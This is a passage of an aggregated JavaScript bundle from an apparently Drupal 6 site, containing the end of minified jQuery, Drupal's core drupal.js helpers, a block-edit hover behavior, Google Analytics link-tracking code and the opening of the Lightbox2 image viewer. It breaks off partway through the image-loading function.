G=this.offsetParent(),J=this.offset(),E=/^body|html$/i.test(G[0].tagName)?{top:0,left:0}:G.offset();J.top-=j(this,"marginTop");J.left-=j(this,"marginLeft");E.top+=j(G,"borderTopWidth");E.left+=j(G,"borderLeftWidth");F={top:J.top-E.top,left:J.left-E.left}}return F},offsetParent:function(){var E=this[0].offsetParent||document.body;while(E&&(!/^body|html$/i.test(E.tagName)&&o.css(E,"position")=="static")){E=E.offsetParent}return o(E)}});o.each(["Left","Top"],function(F,E){var G="scroll"+E;o.fn[G]=function(H){if(!this[0]){return null}return H!==g?this.each(function(){this==l||this==document?l.scrollTo(!F?H:o(l).scrollLeft(),F?H:o(l).scrollTop()):this[G]=H}):this[0]==l||this[0]==document?self[F?"pageYOffset":"pageXOffset"]||o.boxModel&&document.documentElement[G]||document.body[G]:this[0][G]}});o.each(["Height","Width"],function(I,G){var E=I?"Left":"Top",H=I?"Right":"Bottom",F=G.toLowerCase();o.fn["inner"+G]=function(){return this[0]?o.css(this[0],F,false,"padding"):null};o.fn["outer"+G]=function(K){return this[0]?o.css(this[0],F,false,K?"margin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();;

var Drupal = Drupal || { 'settings': {}, 'behaviors': {}, 'themes': {}, 'locale': {} };

/**
 * Set the variable that indicates if JavaScript behaviors should be applied
 */
Drupal.jsEnabled = document.getElementsByTagName && document.createElement && document.createTextNode && document.documentElement && document.getElementById;

/**
 * Attach all registered behaviors to a page element.
 *
 * Behaviors are event-triggered actions that attach to page elements, enhancing
 * default non-Javascript UIs. Behaviors are registered in the Drupal.behaviors
 * object as follows:
 * @code
 *    Drupal.behaviors.behaviorName = function () {
 *      ...
 *    };
 * @endcode
 *
 * Drupal.attachBehaviors is added below to the jQuery ready event and so
 * runs on initial page load. Developers implementing AHAH/AJAX in their
 * solutions should also call this function after new page content has been
 * loaded, feeding in an element to be processed, in order to attach all
 * behaviors to the new content.
 *
 * Behaviors should use a class in the form behaviorName-processed to ensure
 * the behavior is attached only once to a given element. (Doing so enables
 * the reprocessing of given elements, which may be needed on occasion despite
 * the ability to limit behavior attachment to a particular element.)
 *
 * @param context
 *   An element to attach behaviors to. If none is given, the document element
 *   is used.
 */
Drupal.attachBehaviors = function(context) {
  context = context || document;
  if (Drupal.jsEnabled) {
    // Execute all of them.
    jQuery.each(Drupal.behaviors, function() {
      this(context);
    });
  }
};

/**
 * Encode special characters in a plain-text string for display as HTML.
 */
Drupal.checkPlain = function(str) {
  str = String(str);
  var replace = { '&': '&amp;', '"': '&quot;', '<': '&lt;', '>': '&gt;' };
  for (var character in replace) {
    var regex = new RegExp(character, 'g');
    str = str.replace(regex, replace[character]);
  }
  return str;
};

/**
 * Translate strings to the page language or a given language.
 *
 * See the documentation of the server-side t() function for further details.
 *
 * @param str
 *   A string containing the English string to translate.
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 * @return
 *   The translated string.
 */
Drupal.t = function(str, args) {
  // Fetch the localized version of the string.
  if (Drupal.locale.strings && Drupal.locale.strings[str]) {
    str = Drupal.locale.strings[str];
  }

  if (args) {
    // Transform arguments before inserting them
    for (var key in args) {
      switch (key.charAt(0)) {
        // Escaped only
        case '@':
          args[key] = Drupal.checkPlain(args[key]);
        break;
        // Pass-through
        case '!':
          break;
        // Escaped and placeholder
        case '%':
        default:
          args[key] = Drupal.theme('placeholder', args[key]);
          break;
      }
      str = str.replace(key, args[key]);
    }
  }
  return str;
};

/**
 * Format a string containing a count of items.
 *
 * This function ensures that the string is pluralized correctly. Since Drupal.t() is
 * called by this function, make sure not to pass already-localized strings to it.
 *
 * See the documentation of the server-side format_plural() function for further details.
 *
 * @param count
 *   The item count to display.
 * @param singular
 *   The string for the singular case. Please make sure it is clear this is
 *   singular, to ease translation (e.g. use "1 new comment" instead of "1 new").
 *   Do not use @count in the singular string.
 * @param plural
 *   The string for the plural case. Please make sure it is clear this is plural,
 *   to ease translation. Use @count in place of the item count, as in "@count
 *   new comments".
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 *   Note that you do not need to include @count in this array.
 *   This replacement is done automatically for the plural case.
 * @return
 *   A translated string.
 */
Drupal.formatPlural = function(count, singular, plural, args) {
  var args = args || {};
  args['@count'] = count;
  // Determine the index of the plural form.
  var index = Drupal.locale.pluralFormula ? Drupal.locale.pluralFormula(args['@count']) : ((args['@count'] == 1) ? 0 : 1);

  if (index == 0) {
    return Drupal.t(singular, args);
  }
  else if (index == 1) {
    return Drupal.t(plural, args);
  }
  else {
    args['@count['+ index +']'] = args['@count'];
    delete args['@count'];
    return Drupal.t(plural.replace('@count', '@count['+ index +']'));
  }
};

/**
 * Generate the themed representation of a Drupal object.
 *
 * All requests for themed output must go through this function. It examines
 * the request and routes it to the appropriate theme function. If the current
 * theme does not provide an override function, the generic theme function is
 * called.
 *
 * For example, to retrieve the HTML that is output by theme_placeholder(text),
 * call Drupal.theme('placeholder', text).
 *
 * @param func
 *   The name of the theme function to call.
 * @param ...
 *   Additional arguments to pass along to the theme function.
 * @return
 *   Any data the theme function returns. This could be a plain HTML string,
 *   but also a complex object.
 */
Drupal.theme = function(func) {
  for (var i = 1, args = []; i < arguments.length; i++) {
    args.push(arguments[i]);
  }

  return (Drupal.theme[func] || Drupal.theme.prototype[func]).apply(this, args);
};

/**
 * Parse a JSON response.
 *
 * The result is either the JSON object, or an object with 'status' 0 and 'data' an error message.
 */
Drupal.parseJson = function (data) {
  if ((data.substring(0, 1) != '{') && (data.substring(0, 1) != '[')) {
    return { status: 0, data: data.length ? data : Drupal.t('Unspecified error') };
  }
  return eval('(' + data + ');');
};

/**
 * Freeze the current body height (as minimum height). Used to prevent
 * unnecessary upwards scrolling when doing DOM manipulations.
 */
Drupal.freezeHeight = function () {
  Drupal.unfreezeHeight();
  var div = document.createElement('div');
  $(div).css({
    position: 'absolute',
    top: '0px',
    left: '0px',
    width: '1px',
    height: $('body').css('height')
  }).attr('id', 'freeze-height');
  $('body').append(div);
};

/**
 * Unfreeze the body height
 */
Drupal.unfreezeHeight = function () {
  $('#freeze-height').remove();
};

/**
 * Wrapper around encodeURIComponent() which avoids Apache quirks (equivalent of
 * drupal_urlencode() in PHP). This function should only be used on paths, not
 * on query string arguments.
 */
Drupal.encodeURIComponent = function (item, uri) {
  uri = uri || location.href;
  item = encodeURIComponent(item).replace(/%2F/g, '/');
  return (uri.indexOf('?q=') != -1) ? item : item.replace(/%26/g, '%2526').replace(/%23/g, '%2523').replace(/\/\//g, '/%252F');
};

/**
 * Get the text selection in a textarea.
 */
Drupal.getSelection = function (element) {
  if (typeof(element.selectionStart) != 'number' && document.selection) {
    // The current selection
    var range1 = document.selection.createRange();
    var range2 = range1.duplicate();
    // Select all text.
    range2.moveToElementText(element);
    // Now move 'dummy' end point to end point of original range.
    range2.setEndPoint('EndToEnd', range1);
    // Now we can calculate start and end points.
    var start = range2.text.length - range1.text.length;
    var end = start + range1.text.length;
    return { 'start': start, 'end': end };
  }
  return { 'start': element.selectionStart, 'end': element.selectionEnd };
};

/**
 * Build an error message from ahah response.
 */
Drupal.ahahError = function(xmlhttp, uri) {
  if (xmlhttp.status == 200) {
    if (jQuery.trim($(xmlhttp.responseText).text())) {
      var message = Drupal.t("An error occurred. \n@uri\n@text", {'@uri': uri, '@text': xmlhttp.responseText });
    }
    else {
      var message = Drupal.t("An error occurred. \n@uri\n(no information available).", {'@uri': uri, '@text': xmlhttp.responseText });
    }
  }
  else {
    var message = Drupal.t("An HTTP error @status occurred. \n@uri", {'@uri': uri, '@status': xmlhttp.status });
  }
  return message;
}

// Global Killswitch on the <html> element
if (Drupal.jsEnabled) {
  // Global Killswitch on the <html> element
  $(document.documentElement).addClass('js');
  // 'js enabled' cookie
  document.cookie = 'has_js=1; path=/';
  // Attach all behaviors.
  $(document).ready(function() {
    Drupal.attachBehaviors(this);
  });
}

/**
 * The default themes.
 */
Drupal.theme.prototype = {

  /**
   * Formats text for emphasized display in a placeholder inside a sentence.
   *
   * @param str
   *   The text to format (plain-text).
   * @return
   *   The formatted text (html).
   */
  placeholder: function(str) {
    return '<em>' + Drupal.checkPlain(str) + '</em>';
  }
};
;
// $Id: block_edit.js,v 1.1.2.14 2010/02/17 18:24:24 psynaptic Exp $

Drupal.behaviors.block_edit = function (context) {
  if (Drupal.settings.block_edit.hover_links) {
    $('.node-edit-link, .block-edit-link').hide();
    $('div.block, div.node').mouseover(function() {
      $(this).find('.node-edit-link, .block-edit-link').css('display', 'block');
    });

    $('div.block, div.node').mouseout(function() {
      $(this).find('.node-edit-link, .block-edit-link').css('display', 'none');
    });
  };
};
;

$(document).ready(function() {

  // Attach onclick event to document only and catch clicks on all elements.
  $(document.body).click(function(event) {
    // Catch only the first parent link of a clicked element.
    $(event.target).parents("a:first,area:first").andSelf().filter("a,area").each(function() {

      var ga = Drupal.settings.googleanalytics;
      // Expression to check for absolute internal links.
      var isInternal = new RegExp("^(https?):\/\/" + window.location.host, "i");
      // Expression to check for special links like gotwo.module /go/* links.
      var isInternalSpecial = new RegExp("(\/go\/.*)$", "i");
      // Expression to check for download links.
      var isDownload = new RegExp("\\.(" + ga.trackDownloadExtensions + ")$", "i");

      // Is the clicked URL internal?
      if (isInternal.test(this.href)) {
        // Is download tracking activated and the file extension configured for download tracking?
        if (ga.trackDownload && isDownload.test(this.href)) {
          // Download link clicked.
          var extension = isDownload.exec(this.href);
          _gaq.push(["_trackEvent", "Downloads", extension[1].toUpperCase(), this.href.replace(isInternal, '')]);
        }
        else if (isInternalSpecial.test(this.href)) {
          // Keep the internal URL for Google Analytics website overlay intact.
          _gaq.push(["_trackPageview", this.href.replace(isInternal, '')]);
        }
      }
      else {
        if (ga.trackMailto && $(this).is("a[href^=mailto:],area[href^=mailto:]")) {
          // Mailto link clicked.
          _gaq.push(["_trackEvent", "Mails", "Click", this.href.substring(7)]);
        }
        else if (ga.trackOutgoing && this.href) {
          if (ga.trackOutboundAsPageview) {
            // Track all external links as page views after URL cleanup.
            // Currently required, if click should be tracked as goal.
            _gaq.push(["_trackPageview", '/outbound/' + this.href.replace(/^(https?|ftp|news|nntp|telnet|irc|ssh|sftp|webcal):\/\//i, '').split('/').join('--')]);
          }
          else {
            // External link clicked.
            _gaq.push(["_trackEvent", "Outbound links", "Click", this.href]);
          }
        }
      }
    });
  });
});
;
/* $Id: lightbox.js,v 1.5.2.6.2.136 2010/09/24 08:39:40 snpower Exp $ */

/**
 * jQuery Lightbox
 * @author
 *   Stella Power, <http://drupal.org/user/66894>
 *
 * Based on Lightbox v2.03.3 by Lokesh Dhakar
 * <http://www.huddletogether.com/projects/lightbox2/>
 * Also partially based on the jQuery Lightbox by Warren Krewenki
 *   <http://warren.mesozen.com>
 *
 * Permission has been granted to Mark Ashmead & other Drupal Lightbox2 module
 * maintainers to distribute this file via Drupal.org
 * Under GPL license.
 *
 * Slideshow, iframe and video functionality added by Stella Power.
 */

var Lightbox = {
  auto_modal : false,
  overlayOpacity : 0.8, // Controls transparency of shadow overlay.
  overlayColor : '000', // Controls colour of shadow overlay.
  disableCloseClick : true,
  // Controls the order of the lightbox resizing animation sequence.
  resizeSequence: 0, // 0: simultaneous, 1: width then height, 2: height then width.
  resizeSpeed: 'normal', // Controls the speed of the lightbox resizing animation.
  fadeInSpeed: 'normal', // Controls the speed of the image appearance.
  slideDownSpeed: 'slow', // Controls the speed of the image details appearance.
  minWidth: 240,
  borderSize : 10,
  boxColor : 'fff',
  fontColor : '000',
  topPosition : '',
  infoHeight: 20,
  alternative_layout : false,
  imageArray : [],
  imageNum : null,
  total : 0,
  activeImage : null,
  inprogress : false,
  disableResize : false,
  disableZoom : false,
  isZoomedIn : false,
  rtl : false,
  loopItems : false,
  keysClose : ['c', 'x', 27],
  keysPrevious : ['p', 37],
  keysNext : ['n', 39],
  keysZoom : ['z'],
  keysPlayPause : [32],

  // Slideshow options.
  slideInterval : 5000, // In milliseconds.
  showPlayPause : true,
  autoStart : true,
  autoExit : true,
  pauseOnNextClick : false, // True to pause the slideshow when the "Next" button is clicked.
  pauseOnPrevClick : true, // True to pause the slideshow when the "Prev" button is clicked.
  slideIdArray : [],
  slideIdCount : 0,
  isSlideshow : false,
  isPaused : false,
  loopSlides : false,

  // Iframe options.
  isLightframe : false,
  iframe_width : 600,
  iframe_height : 400,
  iframe_border : 1,

  // Video and modal options.
  enableVideo : false,
  flvPlayer : '/flvplayer.swf',
  flvFlashvars : '',
  isModal : false,
  isVideo : false,
  videoId : false,
  modalWidth : 400,
  modalHeight : 400,
  modalHTML : null,


  // initialize()
  // Constructor runs on completion of the DOM loading.
  // The function inserts html at the bottom of the page which is used
  // to display the shadow overlay and the image container.
  initialize: function() {

    var s = Drupal.settings.lightbox2;
    Lightbox.overlayOpacity = s.overlay_opacity;
    Lightbox.overlayColor = s.overlay_color;
    Lightbox.disableCloseClick = s.disable_close_click;
    Lightbox.resizeSequence = s.resize_sequence;
    Lightbox.resizeSpeed = s.resize_speed;
    Lightbox.fadeInSpeed = s.fade_in_speed;
    Lightbox.slideDownSpeed = s.slide_down_speed;
    Lightbox.borderSize = s.border_size;
    Lightbox.boxColor = s.box_color;
    Lightbox.fontColor = s.font_color;
    Lightbox.topPosition = s.top_position;
    Lightbox.rtl = s.rtl;
    Lightbox.loopItems = s.loop_items;
    Lightbox.keysClose = s.keys_close.split(" ");
    Lightbox.keysPrevious = s.keys_previous.split(" ");
    Lightbox.keysNext = s.keys_next.split(" ");
    Lightbox.keysZoom = s.keys_zoom.split(" ");
    Lightbox.keysPlayPause = s.keys_play_pause.split(" ");
    Lightbox.disableResize = s.disable_resize;
    Lightbox.disableZoom = s.disable_zoom;
    Lightbox.slideInterval = s.slideshow_interval;
    Lightbox.showPlayPause = s.show_play_pause;
    Lightbox.showCaption = s.show_caption;
    Lightbox.autoStart = s.slideshow_automatic_start;
    Lightbox.autoExit = s.slideshow_automatic_exit;
    Lightbox.pauseOnNextClick = s.pause_on_next_click;
    Lightbox.pauseOnPrevClick = s.pause_on_previous_click;
    Lightbox.loopSlides = s.loop_slides;
    Lightbox.alternative_layout = s.use_alt_layout;
    Lightbox.iframe_width = s.iframe_width;
    Lightbox.iframe_height = s.iframe_height;
    Lightbox.iframe_border = s.iframe_border;
    Lightbox.enableVideo = s.enable_video;
    if (s.enable_video) {
      Lightbox.flvPlayer = s.flvPlayer;
      Lightbox.flvFlashvars = s.flvFlashvars;
    }

    // Make the lightbox divs.
    var layout_class = (s.use_alt_layout ? 'lightbox2-alt-layout' : 'lightbox2-orig-layout');
    var output = '<div id="lightbox2-overlay" style="display: none;"></div>\
      <div id="lightbox" style="display: none;" class="' + layout_class + '">\
        <div id="outerImageContainer"></div>\
        <div id="imageDataContainer" class="clearfix">\
          <div id="imageData"></div>\
        </div>\
      </div>';
    var loading = '<div id="loading"><a href="#" id="loadingLink"></a></div>';
    var modal = '<div id="modalContainer" style="display: none;"></div>';
    var frame = '<div id="frameContainer" style="display: none;"></div>';
    var imageContainer = '<div id="imageContainer" style="display: none;"></div>';
    var details = '<div id="imageDetails"></div>';
    var bottomNav = '<div id="bottomNav"></div>';
    var image = '<img id="lightboxImage" alt="" />';
    var hoverNav = '<div id="hoverNav"><a id="prevLink" href="#"></a><a id="nextLink" href="#"></a></div>';
    var frameNav = '<div id="frameHoverNav"><a id="framePrevLink" href="#"></a><a id="frameNextLink" href="#"></a></div>';
    var hoverNav = '<div id="hoverNav"><a id="prevLink" title="' + Drupal.t('Previous') + '" href="#"></a><a id="nextLink" title="' + Drupal.t('Next') + '" href="#"></a></div>';
    var frameNav = '<div id="frameHoverNav"><a id="framePrevLink" title="' + Drupal.t('Previous') + '" href="#"></a><a id="frameNextLink" title="' + Drupal.t('Next') + '" href="#"></a></div>';
    var caption = '<span id="caption"></span>';
    var numberDisplay = '<span id="numberDisplay"></span>';
    var close = '<a id="bottomNavClose" title="' + Drupal.t('Close') + '" href="#"></a>';
    var zoom = '<a id="bottomNavZoom" href="#"></a>';
    var zoomOut = '<a id="bottomNavZoomOut" href="#"></a>';
    var pause = '<a id="lightshowPause" title="' + Drupal.t('Pause Slideshow') + '" href="#" style="display: none;"></a>';
    var play = '<a id="lightshowPlay" title="' + Drupal.t('Play Slideshow') + '" href="#" style="display: none;"></a>';

    $("body").append(output);
    $('#outerImageContainer').append(modal + frame + imageContainer + loading);
    if (!s.use_alt_layout) {
      $('#imageContainer').append(image + hoverNav);
      $('#imageData').append(details + bottomNav);
      $('#imageDetails').append(caption + numberDisplay);
      $('#bottomNav').append(frameNav + close + zoom + zoomOut + pause + play);
    }
    else {
      $('#outerImageContainer').append(bottomNav);
      $('#imageContainer').append(image);
      $('#bottomNav').append(close + zoom + zoomOut);
      $('#imageData').append(hoverNav + details);
      $('#imageDetails').append(caption + numberDisplay + pause + play);
    }

    // Setup onclick handlers.
    if (Lightbox.disableCloseClick) {
      $('#lightbox2-overlay').click(function() { Lightbox.end(); return false; } ).hide();
    }
    $('#loadingLink, #bottomNavClose').click(function() { Lightbox.end('forceClose'); return false; } );
    $('#prevLink, #framePrevLink').click(function() { Lightbox.changeData(Lightbox.activeImage - 1); return false; } );
    $('#nextLink, #frameNextLink').click(function() { Lightbox.changeData(Lightbox.activeImage + 1); return false; } );
    $('#bottomNavZoom').click(function() { Lightbox.changeData(Lightbox.activeImage, true); return false; } );
    $('#bottomNavZoomOut').click(function() { Lightbox.changeData(Lightbox.activeImage, false); return false; } );
    $('#lightshowPause').click(function() { Lightbox.togglePlayPause("lightshowPause", "lightshowPlay"); return false; } );
    $('#lightshowPlay').click(function() { Lightbox.togglePlayPause("lightshowPlay", "lightshowPause"); return false; } );

    // Fix positioning.
    $('#prevLink, #nextLink, #framePrevLink, #frameNextLink').css({ 'paddingTop': Lightbox.borderSize + 'px'});
    $('#imageContainer, #frameContainer, #modalContainer').css({ 'padding': Lightbox.borderSize + 'px'});
    $('#outerImageContainer, #imageDataContainer, #bottomNavClose').css({'backgroundColor': '#' + Lightbox.boxColor, 'color': '#'+Lightbox.fontColor});
    if (Lightbox.alternative_layout) {
      $('#bottomNavZoom, #bottomNavZoomOut').css({'bottom': Lightbox.borderSize + 'px', 'right': Lightbox.borderSize + 'px'});
    }
    else if (Lightbox.rtl == 1 && $.browser.msie) {
      $('#bottomNavZoom, #bottomNavZoomOut').css({'left': '0px'});
    }

    // Force navigation links to always be displayed
    if (s.force_show_nav) {
      $('#prevLink, #nextLink').addClass("force_show_nav");
    }

  },

  // initList()
  // Loops through anchor tags looking for 'lightbox', 'lightshow' and
  // 'lightframe', etc, references and applies onclick events to appropriate
  // links. You can rerun after dynamically adding images w/ajax.
  initList : function(context) {

    if (context == undefined || context == null) {
      context = document;
    }

    // Attach lightbox to any links with rel 'lightbox', 'lightshow' or
    // 'lightframe', etc.
    $("a[rel^='lightbox']:not(.lightbox-processed), area[rel^='lightbox']:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
      if (Lightbox.disableCloseClick) {
        $('#lightbox').unbind('click');
        $('#lightbox').click(function() { Lightbox.end('forceClose'); } );
      }
      Lightbox.start(this, false, false, false, false);
      if (e.preventDefault) { e.preventDefault(); }
      return false;
    });
    $("a[rel^='lightshow']:not(.lightbox-processed), area[rel^='lightshow']:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
      if (Lightbox.disableCloseClick) {
        $('#lightbox').unbind('click');
        $('#lightbox').click(function() { Lightbox.end('forceClose'); } );
      }
      Lightbox.start(this, true, false, false, false);
      if (e.preventDefault) { e.preventDefault(); }
      return false;
    });
    $("a[rel^='lightframe']:not(.lightbox-processed), area[rel^='lightframe']:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
      if (Lightbox.disableCloseClick) {
        $('#lightbox').unbind('click');
        $('#lightbox').click(function() { Lightbox.end('forceClose'); } );
      }
      Lightbox.start(this, false, true, false, false);
      if (e.preventDefault) { e.preventDefault(); }
      return false;
    });
    if (Lightbox.enableVideo) {
      $("a[rel^='lightvideo']:not(.lightbox-processed), area[rel^='lightvideo']:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
        if (Lightbox.disableCloseClick) {
          $('#lightbox').unbind('click');
          $('#lightbox').click(function() { Lightbox.end('forceClose'); } );
        }
        Lightbox.start(this, false, false, true, false);
        if (e.preventDefault) { e.preventDefault(); }
        return false;
      });
    }
    $("a[rel^='lightmodal']:not(.lightbox-processed), area[rel^='lightmodal']:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
      $('#lightbox').unbind('click');
      // Add classes from the link to the lightbox div - don't include lightbox-processed
      $('#lightbox').addClass($(this).attr('class'));
      $('#lightbox').removeClass('lightbox-processed');
      Lightbox.start(this, false, false, false, true);
      if (e.preventDefault) { e.preventDefault(); }
      return false;
    });
    $("#lightboxAutoModal:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
      Lightbox.auto_modal = true;
      $('#lightbox').unbind('click');
      Lightbox.start(this, false, false, false, true);
      if (e.preventDefault) { e.preventDefault(); }
      return false;
    });
  },

  // start()
  // Display overlay and lightbox. If image is part of a set, add siblings to
  // imageArray.
  start: function(imageLink, slideshow, lightframe, lightvideo, lightmodal) {

    Lightbox.isPaused = !Lightbox.autoStart;

    // Replaces hideSelectBoxes() and hideFlash() calls in original lightbox2.
    Lightbox.toggleSelectsFlash('hide');

    // Stretch overlay to fill page and fade in.
    var arrayPageSize = Lightbox.getPageSize();
    $("#lightbox2-overlay").hide().css({
      'width': '100%',
      'zIndex': '10090',
      'height': arrayPageSize[1] + 'px',
      'backgroundColor' : '#' + Lightbox.overlayColor
    });
    // Detect OS X FF2 opacity + flash issue.
    if (lightvideo && this.detectMacFF2()) {
      $("#lightbox2-overlay").removeClass("overlay_default");
      $("#lightbox2-overlay").addClass("overlay_macff2");
      $("#lightbox2-overlay").css({'opacity' : null});
    }
    else {
      $("#lightbox2-overlay").removeClass("overlay_macff2");
      $("#lightbox2-overlay").addClass("overlay_default");
      $("#lightbox2-overlay").css({'opacity' : Lightbox.overlayOpacity});
    }
    $("#lightbox2-overlay").fadeIn(Lightbox.fadeInSpeed);


    Lightbox.isSlideshow = slideshow;
    Lightbox.isLightframe = lightframe;
    Lightbox.isVideo = lightvideo;
    Lightbox.isModal = lightmodal;
    Lightbox.imageArray = [];
    Lightbox.imageNum = 0;

    var anchors = $(imageLink.tagName);
    var anchor = null;
    var rel_parts = Lightbox.parseRel(imageLink);
    var rel = rel_parts["rel"];
    var rel_group = rel_parts["group"];
    var title = (rel_parts["title"] ? rel_parts["title"] : imageLink.title);
    var rel_style = null;
    var i = 0;

    if (rel_parts["flashvars"]) {
      Lightbox.flvFlashvars = Lightbox.flvFlashvars + '&' + rel_parts["flashvars"];
    }

    // Set the title for image alternative text.
    var alt = imageLink.title;
    if (!alt) {
      var img = $(imageLink).find("img");
      if (img && $(img).attr("alt")) {
        alt = $(img).attr("alt");
      }
      else {
        alt = title;
      }
    }

    if ($(imageLink).attr('id') == 'lightboxAutoModal') {
      rel_style = rel_parts["style"];
      Lightbox.imageArray.push(['#lightboxAutoModal > *', title, alt, rel_style, 1]);
    }
    else {
      // Handle lightbox images with no grouping.
      if ((rel == 'lightbox' || rel == 'lightshow') && !rel_group) {
        Lightbox.imageArray.push([imageLink.href, title, alt]);
      }

      // Handle other items with no grouping.
      else if (!rel_group) {
        rel_style = rel_parts["style"];
        Lightbox.imageArray.push([imageLink.href, title, alt, rel_style]);
      }

      // Handle grouped items.
      else {

        // Loop through anchors and add them to imageArray.
        for (i = 0; i < anchors.length; i++) {
          anchor = anchors[i];
          if (anchor.href && typeof(anchor.href) == "string" && $(anchor).attr('rel')) {
            var rel_data = Lightbox.parseRel(anchor);
            var anchor_title = (rel_data["title"] ? rel_data["title"] : anchor.title);
            img_alt = anchor.title;
            if (!img_alt) {
              var anchor_img = $(anchor).find("img");
              if (anchor_img && $(anchor_img).attr("alt")) {
                img_alt = $(anchor_img).attr("alt");
              }
              else {
                img_alt = title;
              }
            }
            if (rel_data["rel"] == rel) {
              if (rel_data["group"] == rel_group) {
                if (Lightbox.isLightframe || Lightbox.isModal || Lightbox.isVideo) {
                  rel_style = rel_data["style"];
                }
                Lightbox.imageArray.push([anchor.href, anchor_title, img_alt, rel_style]);
              }
            }
          }
        }

        // Remove duplicates.
        for (i = 0; i < Lightbox.imageArray.length; i++) {
          for (j = Lightbox.imageArray.length-1; j > i; j--) {
            if (Lightbox.imageArray[i][0] == Lightbox.imageArray[j][0]) {
              Lightbox.imageArray.splice(j,1);
            }
          }
        }
        while (Lightbox.imageArray[Lightbox.imageNum][0] != imageLink.href) {
          Lightbox.imageNum++;
        }
      }
    }

    if (Lightbox.isSlideshow && Lightbox.showPlayPause && Lightbox.isPaused) {
      $('#lightshowPlay').show();
      $('#lightshowPause').hide();
    }

    // Calculate top and left offset for the lightbox.
    var arrayPageScroll = Lightbox.getPageScroll();
    var lightboxTop = arrayPageScroll[1] + (Lightbox.topPosition == '' ? (arrayPageSize[3] / 10) : Lightbox.topPosition) * 1;
    var lightboxLeft = arrayPageScroll[0];
    $('#frameContainer, #modalContainer, #lightboxImage').hide();
    $('#hoverNav, #prevLink, #nextLink, #frameHoverNav, #framePrevLink, #frameNextLink').hide();
    $('#imageDataContainer, #numberDisplay, #bottomNavZoom, #bottomNavZoomOut').hide();
    $('#outerImageContainer').css({'width': '250px', 'height': '250px'});
    $('#lightbox').css({
      'zIndex': '10500',
      'top': lightboxTop + 'px',
      'left': lightboxLeft + 'px'
    }).show();

    Lightbox.total = Lightbox.imageArray.length;
    Lightbox.changeData(Lightbox.imageNum);
  },

  // changeData()
  // Hide most elements and preload image in preparation for resizing image
  // container.
  changeData: function(imageNum, zoomIn) {

    if (Lightbox.inprogress === false) {
      if (Lightbox.total > 1 && ((Lightbox.isSlideshow && Lightbox.loopSlides) || (!Lightbox.isSlideshow && Lightbox.loopItems))) {
        if (imageNum >= Lightbox.total) imageNum = 0;
        if (imageNum < 0) imageNum = Lightbox.total - 1;
      }

      if (Lightbox.isSlideshow) {
        for (var i = 0; i < Lightbox.slideIdCount; i++) {
          window.clearTimeout(Lightbox.slideIdArray[i]);
        }
      }
      Lightbox.inprogress = true;
      Lightbox.activeImage = imageNum;

      if (Lightbox.disableResize && !Lightbox.isSlideshow) {
        zoomIn = true;
      }
      Lightbox.isZoomedIn = zoomIn;


      // Hide elements during transition.
      $('#loading').css({'zIndex': '10500'}).show();
      if (!Lightbox.alternative_layout) {
        $('#imageContainer').hide();
      }
      $('#frameContainer, #modalContainer, #lightboxImage').hide();
      $('#hoverNav, #prevLink, #nextLink, #frameHoverNav, #framePrevLink, #frameNextLink').hide();
      $('#imageDataContainer, #numberDisplay, #bottomNavZoom, #bottomNavZoomOut').hide();

      // Preload image content, but not iframe pages.
      if (!Lightbox.isLightframe && !Lightbox.isVideo && !Lightbox.isModal) {
        $("#lightbox #imageDataContainer").removeClass('lightbox2-alt-layout-data');
        imgPreloader = new Image();
        imgPreloader.onerror = function() { Lightbox.imgNodeLoadingError(this); };

        imgPreloader.onload = function() {
          var photo = document.getElementById('lightboxImage');
          photo.src = Lightbox.imageArray[Lightbox.activeImage][0];
          photo.alt = Lightbox.imageArray[Lightbox.activeImage][2];

          var imageWidth = imgPreloader.width;
          var imageHeight = imgPreloader.height;

          // Resize code.
          var arrayPageSize = Lightbox.getPageSize();
          var targ = { w:arrayPageSize[2] - (Lightbox.borderSize * 2), h:arrayPageSize[3] - (Lightbox.borderSize * 6) - (Lightbox.infoHeight * 4) - (arrayPageSize[3] / 10) };
          var orig = { w:imgPreloader.width, h:imgPreloader.height };

          // Image is very large, so show a smaller version of the larger image
          // with zoom button.
          if (zoomIn !== true) {
            var ratio = 1.0; // Shrink image with the same aspect.
            $('#bottomNavZoomOut, #bottomNavZoom').hide();
            if ((orig.w >= targ.w || orig.h >= targ.h) && orig.h && orig.w) {
              ratio = ((targ.w / orig.w) < (targ.h / orig.h)) ? targ.w / orig.w : targ.h / orig.h;
              if (!Lightbox.disableZoom && !Lightbox.isSlideshow) {
                $('#bottomNavZoom').css({'zIndex': '10500'}).show();
              }
            }

            imageWidth  = Math.floor(orig.w * ratio);
            imageHeight = Math.floor(orig.h * ratio);
          }

          else {
            $('#bottomNavZoom').hide();
            // Only display zoom out button if the image is zoomed in already.
            if ((orig.w >= targ.w || orig.h >= targ.h) && orig.h && orig.w) {
              // Only display zoom out button if not a slideshow and if the
              // buttons aren't disabled.
              if (!Lightbox.disableResize && Lightbox.isSlideshow === false && !Lightbox.disableZoom) {
                $('#bottomNavZoomOut').css({'zIndex': '10500'}).show();
              }
            }
          }

          photo.style.width = (imageWidth) + 'px';
          photo.style.height = (imageHeight) + 'px';
          Lightbox.resizeContainer(imageWidth, imageHeight);

          // Clear onLoad, IE behaves irratically with animated gifs otherwise.
